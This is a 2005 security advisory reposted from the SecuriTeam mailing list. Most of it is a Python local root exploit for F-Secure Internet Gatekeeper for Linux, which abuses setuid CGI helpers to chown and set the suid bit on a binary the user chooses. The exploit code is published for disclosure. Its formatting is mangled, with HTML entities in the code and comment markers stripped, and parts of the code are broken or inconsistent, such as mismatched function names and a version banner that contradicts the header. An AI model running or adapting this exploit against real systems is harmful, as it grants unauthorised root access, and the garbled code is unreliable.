[EXPL] F-Secure Internet Gatekeeper Local Root (Exploit)

2005-11-08T00:00:00
ID SECURITYVULNS:DOC:10165
Type securityvulns
Reporter Securityvulns
Modified 2005-11-08T00:00:00

Description

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html


F-Secure Internet Gatekeeper Local Root (Exploit)

SUMMARY

" <http://www.f-secure.com/> F-Secure Internet Gatekeeper is a high-performance and fully automated antivirus and content filtering solution for protecting corporate e-mail (SMTP) and web traffic (HTTP, FTP over HTTP) at the Internet gateway."

Lack of proper input validation within F-Secure Internet Gatekeeper allow local attackers to cause the program to execute arbitrary programs.

DETAILS

Vulnerable Systems: * F-Secure Internet Gatekeeper for Linux version 2.15.483 and prior

Immune Systems: * F-Secure Internet Gatekeeper for Linux version 2.15.484

Exploit:

!/usr/bin/env python

F-Secure Anti-Virus Internet Gatekeeper for Linux <2.15.484

F-Secure Anti-Virus Linux Gateway <2.16 # added line 3-4 for references

/str0ke

fsigk_exp.py: F-Secure Internet Gatekeeper for Linux local root exploit

acknowledgements: everyone in pure-elite and uDc.

coded by: xavier at tigerteam.se [http://xavsec.blogspot.com]

Make proper checks and import nessesary calls from modules.

try: from sys import argv except Exception: print "the 'sys' module could not be loaded" raise SystemExit

try: from os import unlink, stat, error, symlink, system, chmod except Exception: print "the 'os' module could not be loaded" raise SystemExit

try: import getopt except Exception: print "the 'getopt' module could not be loaded" raise SystemExit

Constants.

program = argv[0] version = "0.1beta" author = "<xavier@tigerteam.se>" lastedit = "Thu Sep 22 23:18:39 EDT 2005" usage = """usage: %s [-options]

options: --version show program's version number and exit. -h, --help show this help message and exit.

  -s, --suid  file location to suid.
   -d, --dir  cgi directory.
 -c, --clean  cleans any left over files from the environment

creation. -# enter numerical value of vulnerable file to exploit. [list below]

1: ifconfig_suid.cgi | 2: reboot_suid.cgi | 3: proxy_suid.cgi 4: edittmpl_suid.cgi | 5: version_suid.cgi | 6: hostname_suid.cgi 7: gateway_suid.cgi | 8: halt_suid.cgi | 9: edituserdb_suid.cgi 10: htpasswd_suid.cgi | 11: pattern_up_suid.cgi | 12: license_suid.cgi 13: iptables_suid.cgi | 14: dns_suid.cgi | 15: pattern_autoup_suid.cgi 16: spam_list_suid.cgi | 17: diag_suid.cgi""" % (program)

Functions.

def _write(file, payload): try: open(file, 'w').write(payload) chmod(file, 0100) except Exception, err: print ("[-] %s" % (err))

def _exists(path): try: stat(path) except error: return False return True

def _handleopts(): for opt in argv[1:]: if opt in ("-h", "--help"): print "%s" % (usage), raise SystemExit if opt in ("-v", "--version"): print "%s (%s)" % (version, lastedit), raise SystemExit

_method_ = &#39;ifconfig_suid.cgi&#39;
_file_ = &#39;ifconfig.cgi&#39;
for opt in argv[1:]:
    if opt == &quot;-1&quot;:
        _method_ = &#39;ifconfig_suid.cgi&#39;
    elif opt == &quot;-2&quot;:
        _method_ = &#39;reboot_suid.cgi&#39;
        _file_ = &#39;reboot.cgi&#39;
    elif opt == &quot;-3&quot;:
        _method_ = &#39;proxy_suid.cgi&#39;
        _file_ = &#39;proxy.cgi&#39;
    elif opt == &quot;-4&quot;:
        _method_ = &#39;edittmpl_suid.cgi&#39;
        _file_ = &#39;edittmpl.cgi&#39;
    elif opt == &quot;-5&quot;:
        _method_ = &#39;version_suid.cgi&#39;
        _file_ = &#39;version.cgi&#39;
    elif opt == &quot;-6&quot;:
        _method_ = &#39;hostname_suid.cgi&#39;
        _file_ = &#39;hostname.cgi&#39;
    elif opt == &quot;-7&quot;:
        _method_ = &#39;gateway_suid.cgi&#39;
        _file_ = &#39;gateway.cgi&#39;
    elif opt == &quot;-8&quot;:
        _method_ = &#39;halt_suid.cgi&#39;
        _file_ = &#39;halt.cgi&#39;
    elif opt == &quot;-9&quot;:
        _method_ = &#39;edituserdb_suid.cgi&#39;
        _file_ = &#39;edituserdb.cgi&#39;
    elif opt == &quot;-10&quot;:
        _method_ = &#39;htpasswd_suid.cgi&#39;
        _file_ = &#39;htpasswd.cgi&#39;
    elif opt == &quot;-11&quot;:
        _method_ = &#39;pattern_up_suid.cgi&#39;
        _file_ = &#39;pattern_up.cgi&#39;
    elif opt == &quot;-12&quot;:
        _method_ = &#39;license_suid.cgi&#39;
        _file_ = &#39;license.cgi&#39;
    elif opt == &quot;-13&quot;:
        _method_ = &#39;iptables_suid.cgi&#39;
        _file_ = &#39;iptables.cgi&#39;
    elif opt == &quot;-14&quot;:
        _method_ = &#39;dns_suid.cgi&#39;
        _file_ = &#39;dns.cgi&#39;
    elif opt == &quot;-15&quot;:
        _method_ = &#39;pattern_autoup_suid.cgi&#39;
        _file_ = &#39;pattern_autoup.cgi&#39;
    elif opt == &quot;-16&quot;:
        _method_ = &#39;spam_list_suid.cgi&#39;
        _file_ = &#39;spam_list.cgi&#39;
    elif opt == &quot;-17&quot;:
        _method_ = &#39;diag_suid.cgi&#39;
        _file_ = &#39;diag.cgi&#39;
    else:
        pass

try:
    opts = getopt.getopt&#40;argv[1:], &#39;c1234567890s:d:&#39;, [&#39;clean&#39;, &#92;
                                                      &#39;suid=&#39;, &#92;
                                                      &#39;dir=&#39;]&#41;[0]
except Exception, &#40;err&#41;:
    print &quot;[-] &#37;s&quot; &#37; &#40;err&#41;,
    raise SystemExit

_dir_ = None
_payload_ = None
_combine_ = None

for o, a in opts:
    if o in &#40;&quot;-c&quot;, &quot;--clean&quot;&#41;:
        _clean&#40;&#41;
        print &quot;[*] done&quot;
        raise SystemExit
    if o in &#40;&quot;-d&quot;, &quot;--dir&quot;&#41;:
        if _exists&#40;a&#41;:
            _dir_ = a
        else:
            print &quot;[-] unable to access the &#37;s directory&quot; &#37; &#40;_dir_&#41;,
            raise SystemExit
    if o in &#40;&quot;-s&quot;, &quot;--suid&quot;&#41;:
        if _exists&#40;a&#41;:
            _payload_ = _suid&#40;a&#41;
        else:
            print &quot;[-] unable to access binary.&quot;
            raise SystemExit

if _dir_ == None:
    print &quot;[-] no directory was given [try -h for help menu]&quot;
    raise SystemExit
if _payload_ == None:
    print &quot;[-] enter binary to suid [try -h for help menu]&quot;
    raise SystemExit
_combined_ = &quot;&#37;s/&#37;s&quot; &#37; &#40;_dir_, _method_&#41;
if not _exists&#40;_combined_&#41;:
    print &quot;[-] method not possible, try another.&quot;
    raise SystemExit

print &quot;[*] creating environment...&quot;
try:
    symlink&#40;&#39;&#37;s/&#37;s&#39; &#37; &#40;_dir_, _method_&#41;, &#39;runbad&#39;&#41;
    _write&#40;_file_, _payload_&#41;
except Exception, err:
    raise SystemExit

def suid(file): _suid = """#!/bin/sh chown 0.0 %(file)s chmod 4755 %(file)s """ % (locals()) return suid

def _clean(): try: files = ['runbad', 'ifconfig.cgi', 'reboot.cgi', 'proxy.cgi', 'edittmpl.cgi', 'version.cgi', 'hostname.cgi', 'gateway.cgi', 'halt.cgi', 'edituserdb.cgi', 'htpasswd.cgi', 'pattern_up.cgi', 'license.cgi', 'iptables.cgi', 'dns.cgi', 'pattern_autoup.cgi', 'spam_list.cgi', 'diag_suid.cgi']

    for file in files:
        if _exists&#40;file&#41;: unlink&#40;file&#41;

except Exception, err:
    print &quot;[-] &#37;s&quot; &#37; &#40;err&#41;,

main() // main code.

def main(): try: print "[INFO] F-Secure Internet Gatekeeper for Linux <=2.10-431 local exploit by %s" % (author) print "[] handling options, arguments..." _handleopts() print "[] executing exploit..." system('./runbad') print "[] cleaning..." _clean() print "[] done... try executing the specified binary." except KeyboardInterrupt: print "[-] caught keyboard interuption" raise SystemExit except Exception, (err): _clean() raise SystemExit

if name == 'main': main()

EoF

ADDITIONAL INFORMATION

The information has been provided by <mailto:xavier@tigerteam.se> Xavier de Leon.

========================================

This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.